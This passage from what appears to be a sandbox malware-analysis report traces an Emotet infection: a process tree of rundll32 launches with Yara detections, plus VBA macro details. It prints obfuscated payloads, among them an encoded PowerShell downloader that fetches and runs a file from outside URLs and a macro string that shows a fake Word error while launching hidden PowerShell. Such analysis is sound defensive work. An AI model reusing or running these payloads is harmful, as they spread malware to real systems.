CcAKQArACgAJwBzADoAJwArACcALwAvAGwAaQBuACcAKQArACcAaABrACcAKwAoACcAaQAnACsAJwBlAG4AJwApACsAJwBtACcAKwAoACcAYQAnACsAJwB5AHQAaQAnACsAJwBuAGgALgB0ACcAKQArACcAYwAnACsAJwB0AGUAJwArACgAJwBkAHUALgBjAG8AJwArACcAbQAnACsAJwAvAHcAcAAtACcAKwAnAHMAbgAnACkAKwAnAGEAJwArACgAJwBwAHMAJwArACcAaABvACcAKwAnAHQAcwAvAFYAJwApACsAJwB6ACcAKwAnAEoATQAnACsAJwAvACcAKQAuACIAcgBlAFAAYABMAEEAYwBlACIAKAAoACgAJwBuAHMAJwArACcAIAB3ACcAKQArACcAdQAnACsAKAAnACAAZABiACAAbgAnACsAJwBkACcAKQApACwAKABbAGEAcgByAGEAeQBdACgAJwBuAGoAJwAsACcAdAByACcAKQAsACcAeQBqACcALAAnAHMAYwAnACwAJABKAGcANAAxAHMAYwB3ACwAJwB3AGQAJwApAFsAMwBdACkALgAiAHMAUABsAGAAaQBUACIAKAAkAE8AMwAyAE8AIAArACAAJABaAHoAOAAyAF8ANAAyACAAKwAgACQATwA3ADQAWQApADsAJABIADAAOABUAD0AKAAoACcAQgA2ACcAKwAnADgAJwApACsAJwBKACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQAVwByAGEAdgB0AGkAZQAgAGkAbgAgACQATgBpAG8AbwBpADIAcQApAHsAdAByAHkAewAoACYAKAAnAE4AZQB3AC0AJwArACcATwAnACsAJwBiAGoAZQAnACsAJwBjAHQAJwApACAAcwBZAHMAVABlAG0ALgBOAEUAdAAuAFcAZQBiAEMAbABpAEUATgB0ACkALgAiAEQATwBXAGAATgBsAGAATwBhAGQAZgBgAEkATABlACIAKAAkAFcAcgBhAHYAdABpAGUALAAgACQAVQBrADEAdAB0ADEAXwApADsAJABLAF8ANQBCAD0AKAAnAFQAMgAnACsAJwBfAFYAJwApADsASQBmACAAKAAoAC4AKAAnAEcAZQB0ACcAKwAnAC0ASQB0AGUAbQAnACkAIAAkAFUAawAxAHQAdAAxAF8AKQAuACIAbABlAGAATgBnAHQAaAAiACAALQBnAGUAIAAzADEAOAAxADQAKQAgAHsAJgAoACcAcgB1AG4AZABsAGwAMwAnACsAJwAyACcAKQAgACQAVQBrADEAdAB0ADEAXwAsACgAKAAnAEEAbgAnACsAJwB5AFMAdAAnACkAKwAoACcAcgAnACsAJwBpAG4AJwApACsAJwBnACcAKQAuACIAdABvAFMAVAByAGkAYABOAEcAIgAoACkAOwAkAEcAMAAzAEwAPQAoACcAVQA1ACcAKwAnADYAUwAnACkAOwBiAHIAZQBhAGsAOwAkAFIAMQAzAEoAPQAoACcAUgA4ACcAKwAnAF8ASgAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEoAOAAyAEUAPQAoACcAVwAnACsAKAAnADIAOAAnACsAJwBMACcAKQApAA==
Imagebase:	0x13ffe0000
File size:	473600 bytes
MD5 hash:	852D67A27E454BD389FA7F02A8CBE23F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 3016 Parent PID: 2280

General

Start time:	20:12:32
Start date:	25/01/2021
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\system32\rundll32.exe' C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dll AnyString
Imagebase:	0xffd90000
File size:	45568 bytes
MD5 hash:	DD81D91FF3B0763C392422865C9AC12E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: rundll32.exe PID: 2940 Parent PID: 3016

General

Start time:	20:12:32
Start date:	25/01/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\system32\rundll32.exe' C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dll AnyString
Imagebase:	0x820000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.2330819639.0000000000170000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.2330883211.00000000001F0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.2330983345.0000000000430000.00000040.00020000.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: rundll32.exe PID: 3044 Parent PID: 2940

General

Start time:	20:12:33
Start date:	25/01/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dll',#1
Imagebase:	0x820000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.2333967935.0000000000280000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.2334066475.0000000000400000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.2333875086.00000000001F0000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: rundll32.exe PID: 2960 Parent PID: 3044

General

Start time:	20:12:35
Start date:	25/01/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Eahqlsuythns\jqbptpobcyu.bhl',TagYErhYzyY
Imagebase:	0x820000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.2335393724.0000000000280000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.2335519485.0000000000340000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.2335352749.00000000001E0000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: rundll32.exe PID: 2184 Parent PID: 2960

General

Start time:	20:12:36
Start date:	25/01/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Eahqlsuythns\jqbptpobcyu.bhl',#1
Imagebase:	0x820000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.2338149952.0000000000210000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.2338282736.00000000002B0000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.2338123179.00000000001E0000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: rundll32.exe PID: 1468 Parent PID: 2184

General

Start time:	20:12:37
Start date:	25/01/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Xhprrouvvr\jernautsj.lga',fTCwfSeUSxEuwMN
Imagebase:	0x820000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000B.00000002.2339483010.00000000001F0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000B.00000002.2339586653.0000000000400000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000B.00000002.2339441337.00000000001C0000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: rundll32.exe PID: 1836 Parent PID: 1468

General

Start time:	20:12:38
Start date:	25/01/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Xhprrouvvr\jernautsj.lga',#1
Imagebase:	0x820000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000C.00000002.2342398831.00000000001E0000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000C.00000002.2342378229.0000000000160000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000C.00000002.2342497051.0000000000280000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: rundll32.exe PID: 3056 Parent PID: 1836

General

Start time:	20:12:39
Start date:	25/01/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lajmixobikmt\gjxhkbksotj.zja',ZPegu
Imagebase:	0x820000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000D.00000002.2343974004.00000000004A0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000D.00000002.2343885574.0000000000400000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000D.00000002.2343843229.00000000001F0000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: rundll32.exe PID: 3052 Parent PID: 3056

General

Start time:	20:12:40
Start date:	25/01/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lajmixobikmt\gjxhkbksotj.zja',#1
Imagebase:	0x820000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000E.00000002.2347071363.00000000002B0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000E.00000002.2346880947.00000000001B0000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000E.00000002.2347031079.0000000000280000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: rundll32.exe PID: 2228 Parent PID: 3052

General

Start time:	20:12:41
Start date:	25/01/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Txroij\ohrhi.kon',FegmxWWxi
Imagebase:	0x820000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000F.00000002.2348536550.0000000000250000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000F.00000002.2348563781.00000000002F0000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000F.00000002.2348503069.00000000001A0000.00000040.00000001.sdmp, Author: Joe Security

Chronological Activities

Analysis Process: rundll32.exe PID: 2376 Parent PID: 2228

General

Start time:	20:12:42
Start date:	25/01/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Txroij\ohrhi.kon',#1
Imagebase:	0x820000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000010.00000002.2351415450.0000000000750000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000010.00000002.2351067576.0000000000270000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000010.00000002.2351291099.00000000006B0000.00000040.00020000.sdmp, Author: Joe Security

Chronological Activities

Analysis Process: rundll32.exe PID: 172 Parent PID: 2376

General

Start time:	20:12:43
Start date:	25/01/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Whtybzptnxj\kaptmaxkac.ztu',jkFqU
Imagebase:	0x820000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000011.00000002.2352976974.0000000000400000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000011.00000002.2352906309.0000000000160000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000011.00000002.2352930564.00000000001C0000.00000040.00000001.sdmp, Author: Joe Security

Chronological Activities

Analysis Process: rundll32.exe PID: 2056 Parent PID: 172

General

Start time:	20:12:44
Start date:	25/01/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Whtybzptnxj\kaptmaxkac.ztu',#1
Imagebase:	0x820000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000012.00000002.2355550940.00000000006E0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000012.00000002.2355569966.0000000000750000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000012.00000002.2355670534.0000000000930000.00000040.00000001.sdmp, Author: Joe Security

Chronological Activities

Analysis Process: rundll32.exe PID: 2884 Parent PID: 2056

General

Start time:	20:12:45
Start date:	25/01/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Dzirlcatgln\dntukqrwhf.kiu',JykcjQ
Imagebase:	0x820000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000013.00000002.2358322887.0000000000220000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000013.00000002.2359551824.0000000000460000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000013.00000002.2358696763.0000000000270000.00000040.00000001.sdmp, Author: Joe Security

Chronological Activities

Analysis Process: rundll32.exe PID: 2864 Parent PID: 2884

General

Start time:	20:12:46
Start date:	25/01/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Dzirlcatgln\dntukqrwhf.kiu',#1
Imagebase:	0x820000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000014.00000002.2360129710.0000000000200000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000014.00000002.2360111276.00000000001D0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000014.00000002.2360228021.0000000000400000.00000040.00020000.sdmp, Author: Joe Security

Chronological Activities

Analysis Process: rundll32.exe PID: 252 Parent PID: 2864

General

Start time:	20:12:48
Start date:	25/01/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Mxtcfbxykefck\ibcdoyenctts.gsv',pUHKMD
Imagebase:	0x820000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000015.00000002.2363852482.00000000001A0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000015.00000002.2368454329.0000000000400000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000015.00000002.2364687136.00000000001D0000.00000040.00000001.sdmp, Author: Joe Security

Chronological Activities

Analysis Process: rundll32.exe PID: 2688 Parent PID: 252

General

Start time:	20:12:49
Start date:	25/01/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Mxtcfbxykefck\ibcdoyenctts.gsv',#1
Imagebase:	0x820000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000016.00000002.2368006651.0000000000250000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000016.00000002.2368531156.0000000000450000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000016.00000002.2367980145.0000000000220000.00000040.00000001.sdmp, Author: Joe Security

Chronological Activities

Analysis Process: rundll32.exe PID: 1084 Parent PID: 2688

General

Start time:	20:12:50
Start date:	25/01/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ynnlsbotf\dxdmxwxi.pod',nZgZ
Imagebase:	0x820000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000017.00000002.2369643612.0000000000180000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000017.00000002.2370162675.00000000003B0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000017.00000002.2370274121.0000000000550000.00000040.00000001.sdmp, Author: Joe Security

Chronological Activities

Analysis Process: rundll32.exe PID: 1072 Parent PID: 1084

General

Start time:	20:12:52
Start date:	25/01/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ynnlsbotf\dxdmxwxi.pod',#1
Imagebase:	0x820000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000018.00000002.2485894589.00000000002C0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000018.00000002.2486292831.0000000002010000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000018.00000002.2485863461.00000000001F0000.00000040.00000001.sdmp, Author: Joe Security

Chronological Activities

Disassembly

Code Analysis

VBA Code

Call Graph

Entrypoint
Decryption Function
Executed
Not Executed
Show Help

Module: Gp0t5ucwnkng7fi

Declaration

Line	Content
1	Attribute VB_Name = "Gp0t5ucwnkng7fi"

Executed Functions

Function Xusmagx95iuck_o3o, APIs: 126, Strings: 38, Number of lines: 135, Relevance: 297.635

APIs	Meta Information
Array
AjzpdH
Target
Split
yqmFHJvF
jbkkjHHCd
Nkemmqfhxex
Content
Dt5ebejo9lypr_3vmp
Array
wPuUI
Target
Split
TfZstIBWb
QNBiBDJF
Array
mQUInscCB
Target
Split
NxyDdD
PmHbFtBA
Array
ZcbWFy
Target
Split
uwcdCFcFJ
jmprxcAGG
Array
upIoDlhH
Target
Split
DpdIEHHc
BZLGJ
Mid
Name
Application
Array
LFmsHlGJO
Target
Split
DReLBGD
VlJBAxsF
Array
QttEc
Target
Split
ybkwIF
sInuFuLII
Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: Array
Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: OtpOArK
Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: Target
Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: Split
Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: iJkmJG
Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: mbLvUI
Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: Array
Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: vQbVHTJ
Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: Target
Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: Split
Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: mbdQXnNAJ
Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: SRadpEcF
Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: Array
Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: gPxXF
Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: Target
Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: Split
Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: IcBqyoTE
Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: vMqQFsCmr
Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: Array
Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: huzCVaAnM
Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: Target
Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: Split
Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: AEpDpJGH
Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: nmoAspl
Array
JNPIBwzJy
Target
Split
MtSXGFAwF
xJhvfW
GetObject	GetObject("winmgmts:win32_process")
Array
vXvXQH
Target
Split
AnoeDGEY
BBnudDV
Mid
Len	Len(" ns wu db ndns wu db ndcns wu db ndmns wu db nddns wu db nd ns wu db ndcns wu db ndmns wu db nddns wu db nd ns wu db nd/ns wu db ndcns wu db nd ns wu db ndmns wu db nd^ns wu db ndsns wu db nd^ns wu db ndgns wu db nd ns wu db nd%ns wu db nduns wu db ndsns wu db ndens wu db ndrns wu db ndnns wu db ndans wu db ndmns wu db ndens wu db nd%ns wu db nd ns wu db nd/ns wu db ndvns wu db nd ns wu db ndWns wu db ndons wu db nd^ns wu db ndrns wu db nddns wu db nd ns wu db ndens wu db ndxns wu db ndpns wu db nd^ns wu db ndens wu db ndrns wu db ndins wu db ndens wu db ndnns wu db nd^ns wu db ndcns wu db ndens wu db nddns wu db nd ns wu db ndans wu db ndnns wu db nd ns wu db ndens wu db ndrns wu db nd^ns wu db ndrns wu db ndons wu db ndrns wu db nd ns wu db ndtns wu db ndrns wu db ndyns wu db ndins wu db nd^ns wu db ndnns wu db ndgns wu db nd ns wu db ndtns wu db ndons wu db nd ns wu db ndons wu db ndpns wu db nd^ns wu db ndens wu db ndnns wu db nd ns wu db ndtns wu db ndhns wu db nd^ns wu db ndens wu db nd ns wu db ndfns wu db ndins wu db nd^ns wu db ndlns wu db ndens wu db nd.ns wu db nd ns wu db nd&ns wu db nd ns wu db ndpns wu db nd^ns wu db ndons wu db ndwns wu db ndens wu db nd^ns wu db ndrns wu db ndsns wu db nd^ns wu db ndhns wu db ndens wu db nd^ns wu db ndlns wu db ndlns wu db nd^ns wu db nd ns wu db nd-ns wu db ndwns wu db nd ns wu db ndhns wu db ndins wu db nd^ns wu db nddns wu db nddns wu db nd^ns wu db ndens wu db ndnns wu db nd ns wu db nd-ns wu db nd^ns wu db ndens wu db nd^ns wu db ndnns wu db ndcns wu db nd ns wu db nd ns wu db nd ns wu db nd ns wu db nd ns wu db nd ns wu db nd ns wu db nd ns wu db nd ns wu db nd ns wu db nd ns wu db nd ns wu db nd ns wu db nd IAns wu db ndAgns wu db ndAFns wu db ndMAns wu db ndZQns wu db ndBUns wu db ndACns wu db nd0Ans wu db ndSQns wu db ndBUns wu db ndAEns wu db ndUAns wu db ndTQns wu db ndAgns wu db ndACns wu db ndAAns wu db ndKAns wu db ndAnns wu db ndAHns wu db ndYAns wu db ndJwns wu db ndArns wu db ndACns wu db ndcAns wu db ndQQns wu db ndBSns wu db ndAGns wu db ndkAns wu db ndYQns wu db ndAnns wu db ndACns wu db ndsAns wu db ndJwns wu db ndBCns wu db ndAGns wu db ndwAns wu db ndRQns wu db ndA6ns wu db ndAGns wu db ndYAns wu db ndJwns wu db ndArns wu db ndACns wu db ndcAns wu db ndNwns wu db ndBEns wu db ndACns wu db ndcAns wu db ndKwns wu db ndAnns wu db ndAEns wu db ndgAns wu db ndJwns wu db ndApns wu db ndACns wu db ndAAns wu db ndIAns wu db ndAons wu db ndACns wu db ndAAns wu db ndWwns wu db ndBUns wu db ndAFns wu db ndkAns wu db ndUAns wu db ndBlns wu db ndAFns wu db nd0Ans wu db ndKAns wu db ndAins wu db ndAHns wu db ndsAns wu db ndMgns wu db ndB9ns wu db ndAHns wu db ndsAns wu db ndMAns wu db ndB9ns wu db ndAHns wu db ndsAns wu db ndNAns wu db ndB9ns wu db ndAHns wu db ndsAns wu db ndMQns wu db ndB9ns wu db ndAHns wu db ndsAns wu db ndMwns wu db ndB9ns wu db ndACns wu db ndIAns wu db ndLQns wu db ndBGns wu db ndACns wu db ndAAns wu db ndJwns wu db ndBTns wu db ndAHns wu db ndQAns wu db ndZQns wu db ndBNns wu db ndACns wu db nd4Ans wu db ndaQns wu db ndBPns wu db ndACns wu db ndcAns wu db ndLAns wu db ndAnns wu db ndAGns wu db ndMAns wu db nddAns wu db ndBvns wu db ndACns wu db ndcAns wu db ndLAns wu db ndAnns wu db ndAHns wu db ndMAns wu db ndeQns wu db ndAnns wu db ndACns wu db ndwAns wu db ndJwns wu db ndByns wu db ndAHns wu db ndkAns wu db ndJwns wu db ndAsns wu db ndACns wu db ndcAns wu db ndLgns wu db ndBkns wu db ndAGns wu db ndkAns wu db ndcgns wu db ndBlns wu db ndACns wu db ndcAns wu db ndKQns wu db ndApns wu db ndACns wu db ndAAns wu db ndIAns wu db ndA7ns wu db ndACns wu db ndAAns wu db ndcwns wu db ndBFns wu db ndAHns wu db ndQAns wu db ndLQns wu db ndBJns wu db ndAHns wu db ndQAns wu db ndRQns wu db ndBNns wu db ndACns wu db ndAAns wu db ndVgns wu db ndBhns wu db ndAFns wu db ndIAns wu db ndaQns wu db ndBBns wu db ndAEns wu db ndIAns wu db ndTAns wu db ndBlns wu db ndADns wu db ndoAns wu db ndUwns wu db ndBnns wu db ndADns wu db ndIAns wu db ndeAns wu db ndBVns wu db ndACns wu db ndAAns wu db ndKAns wu db ndAgns wu db ndACns wu db ndAAns wu db ndWwns wu d) -> 37616
